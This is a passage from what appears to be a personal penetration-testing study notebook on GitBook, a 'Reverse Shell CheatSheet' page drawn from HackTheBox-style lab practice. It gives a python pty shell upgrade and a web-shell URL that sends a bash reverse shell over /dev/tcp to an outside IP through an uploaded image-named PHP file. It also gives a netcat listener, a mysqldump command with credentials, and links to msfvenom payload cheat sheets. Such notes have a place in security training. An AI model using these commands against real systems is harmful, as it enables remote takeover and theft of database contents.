😁
Try Harder Journey
  • About this Journey
  • Recon/Enumeration
  • Exploitation
    • Apache Exploitations
      • Log4j vuln CVE-2021-44228
  • Privilege Escalation
  • Linux/Unix
  • Reverse Shell CheatSheet
  • BOF
    • TryHackMe BOF Prep
  • Port Forwarding
  • File Transfer
  • Proof
  • Report
  • Python
  • AD Attack
    • HTB AD
      • HTB: Reel 10 Nov 2018
      • HTB: Active 08 Dec 2018
    • THM AD
    • Cheatsheets Notes
  • Cloud
    • Zero Trust
    • Azure
    • AWS
    • GCP
  • OSINT
  • Web Application
    • File upload vulnerabilities
      • Tryhackme File Upload Vulnerabilities
      • Web Security Academy File upload Vulnerabilities
      • Bypass Disable Functions (THM WT)
  • HTB
    • Blocky HTB Walkthrough
  • References
Powered by GitBook
On this page

Was this helpful?

Reverse Shell CheatSheet

PreviousLinux/UnixNextBOF

Last updated 3 years ago

Was this helpful?

CMD. PHP.NetCat (Apache server) user or root

which python
python3 -c 'import pty;pty.spawn("/bin/bash")' 
python -c 'import pty;pty.spawn("/bin/bash")' 
http:http://10.10.10.5/images/uploads/avatar.php.png?cmd=bash -c 'bash -i >%26 /dev/tcp/10.10.14.20/443 0>%261'
nc -lvpn 443

mysql dump commands (password , username from db.php or db page

mysqldump --user=these --password=iheseus --host=localhost Magic7777

Details reference link:

MSFVenom Cheatsheet

Details references link:

https://github.com/frizb/MSF-Venom-Cheatsheet
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
MSFVenom Cheat Sheet - Easy Way To Create Metasploit Payloads | The Dark SourceThe Dark Source
MSFVenom - CheatSheetHackTricks
Creating Metasploit PayloadsNetSec
Logo
Logo
Logo